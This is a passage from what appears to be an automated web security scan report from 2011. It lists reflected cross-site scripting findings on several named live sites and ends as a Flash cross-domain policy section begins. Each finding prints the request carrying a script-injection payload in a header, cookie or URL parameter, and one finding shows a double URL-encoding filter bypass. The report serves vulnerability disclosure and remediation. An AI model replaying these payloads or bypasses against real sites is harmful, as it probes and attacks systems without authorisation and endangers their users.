Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=55832<script>alert(1)</script>0884fff0392

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:09 GMT
Expires: Tue, 03 May 2011 20:49:09 GMT
Content-Length: 697
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 51032<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
<BR>
Referer: http://www.google.com/search?hl=en&q=55832<script>alert(1)</script>0884fff0392<BR>
...[SNIP]...

6.108. http://www.courts.info/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 34fc6<script>alert(1)</script>04839b2ad02 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.334fc6<script>alert(1)</script>04839b2ad02
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:06 GMT
Expires: Tue, 03 May 2011 20:49:06 GMT
Content-Length: 645
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 50920<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
<BR>
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.334fc6<script>alert(1)</script>04839b2ad02<BR>
...[SNIP]...

6.109. http://www.democratsenators.org/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.democratsenators.org
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 221fc<script>alert(1)</script>2dfd3bdfab3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.democratsenators.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=221fc<script>alert(1)</script>2dfd3bdfab3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=369BEF78AF569E8FE72068A8BEA3D26B-n3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 02:15:27 GMT
Set-Cookie: Coyote-2-aae531e=aae52cb:0; path=/
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>2dfd3bdfab3'>http://www.google.com/search?hl=en&q=221fc<script>alert(1)</script>2dfd3bdfab3</a>
...[SNIP]...

6.110. http://www.democratsenators.org/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.democratsenators.org
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64812'><script>alert(1)</script>50bbdc68680 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.democratsenators.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=64812'><script>alert(1)</script>50bbdc68680

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=020D993D49405BD7D59DFB29D036AEB3-n2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 02:15:27 GMT
Set-Cookie: Coyote-2-aae531e=aae52ca:0; path=/
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=64812'><script>alert(1)</script>50bbdc68680'>
...[SNIP]...

6.111. http://www.jpeterman.com/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jpeterman.com
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 60bbd--><script>alert(1)</script>e8e97a34f5d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.360bbd--><script>alert(1)</script>e8e97a34f5d
Host: www.jpeterman.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private, no-store
Content-Length: 10719
Content-Type: text/html; charset=utf-8
Expires: Tue, 03 May 2011 01:20:01 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ThePage_ECommerce_STATE=qY1Y4zgsGyT50k21Hhrbdg; path=/
Set-Cookie: SessModDt=5/3/2011 6:20:01 PM; expires=Tue, 04-May-2021 01:20:01 GMT; path=/
Date: Wed, 04 May 2011 01:20:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page: /404.rsp?404http://www.jpeterman.com:80/favicon.ico Url: http://ww
...[SNIP]...
<!-- IP: 173.193.214.243 User: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.360bbd--><script>alert(1)</script>e8e97a34f5d -->
...[SNIP]...

6.112. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/cnetnews/300x250/cnetnews_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f77e"><script>alert(1)</script>2c599ac421f was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb95f77e"><script>alert(1)</script>2c599ac421f; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjcwLCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiMDRiOWJiMjMtZTQ1YS00YmUxLTgxZGMtOGM3NDViY2EzYjFhIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOTVmNzdlIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+MmM1OTlhYzQyMWYiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgImNuZXRuZXdzX2F0ZiIsICBkaXY6ICAgICAgICAgICIwNGI5YmIyMy1lNDVhLTRiZTEtODFkYy04Yzc0NWJjYTNiMWEiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL2Nic2ludGVyYWN0aXZlLmNvbSIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDExMSwgIGFjY291bnRfaWQ6ICAgNjYwNjMsICBuZXR3b3JrX25hbWU6ICJIb3VzZSBBcnQiLCAgcHVibGlzaGVyX25hbWU6ICJjYnNpbnRlcmFjdGl2ZSIsICBlY3BtOiAgICAgICAgICIwLjI1IiwgIGZlY3BtOiAgICAgICAgIjAuMjUiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgImNuZXRuZXdzX2F0ZiIsICBydWxlOiAgICAgICAgICJjbmV0bmV3c19hdGYiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NDE3LCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUcmlnZ2l0IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTYxNSwgImJ1eSI6MTI0MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NjYyLCAiYnV5IjoxODksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NzY3LCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MDg1LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzM5In0=
Content-Length: 1973
Content-Type: text/html
Date: Wed, 04 May 2011 01:29:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb95f77e"><script>alert(1)</script>2c599ac421f&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

6.113. http://tracking.moon-ray.com/track.php [sess_ cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The value of the sess_ cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 120cf'%3balert(1)//3ee93f62c0a was submitted in the sess_ cookie. This input was echoed as 120cf';alert(1)//3ee93f62c0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_7&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y120cf'%3balert(1)//3ee93f62c0a; mr_src=mr_7

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:02:16 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 309

_mrd.cookie='sess_=ysv9sd684163c3y120cf';alert(1)//3ee93f62c0a;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618129;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_7;' + _mr_ex + ';'+'path=/';var _mrTrackLi
...[SNIP]...

6.114. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d60d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c1fd9d84d6 was submitted in the REST URL parameter 1. This input was echoed as 8d60d"><script>alert(1)</script>6c1fd9d84d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico8d60d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c1fd9d84d6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:26:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash06
X-AspNet-Version: 2.0.50727
Content-Length: 200
Location: http://nextbigfuture.com/favicon.ico8d60d"><script>alert(1)</script>6c1fd9d84d6
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico8d60d"><script>alert(1)</script>6c1fd9d84d6">here</a>.</body>

6.115. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be1c"><script>alert(1)</script>b1dc0d82006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:26:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash03
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://nextbigfuture.com/favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1">here</a>.</body
...[SNIP]...

6.116. http://www.pilotpentennis.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pilotpentennis.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ffb3<script>alert(1)</script>ab30ad0dce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pilotpentennis.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 May 2011 02:02:08 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 265
Location: http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1">http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1</a>
...[SNIP]...

6.117. http://www.pilotpentennis.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pilotpentennis.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51cba"><script>alert(1)</script>6765bf89c5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pilotpentennis.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 May 2011 02:02:08 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 269
Location: http://www.newhavenopen.com/favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.newhavenopen.com/favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1">http://www.newhavenopen.com/favico
...[SNIP]...

6.118. http://www.safecu.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safecu.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63257"><script>alert(1)</script>8571f9c9a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico63257"><script>alert(1)</script>8571f9c9a7a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.safecu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object Moved
Server: NS_6.1
Location: https://www.safecu.org/favicon.ico63257"><script>alert(1)</script>8571f9c9a7a
Content Type: text/html
Cache Control: private
Connection: close

<head><body> This object may be found <a HREF="https://www.safecu.org/favicon.ico63257"><script>alert(1)</script>8571f9c9a7a">here</a> </body>

6.119. http://www.safecu.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safecu.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1cb"><script>alert(1)</script>b00754852b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.safecu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object Moved
Server: NS_6.1
Location: https://www.safecu.org/favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1
Content Type: text/html
Cache Control: private
Connection: close

<head><body> This object may be found <a HREF="https://www.safecu.org/favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1">here</a> </body>

7. Flash cross-domain policy  previous  next
There are 384 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity: &nb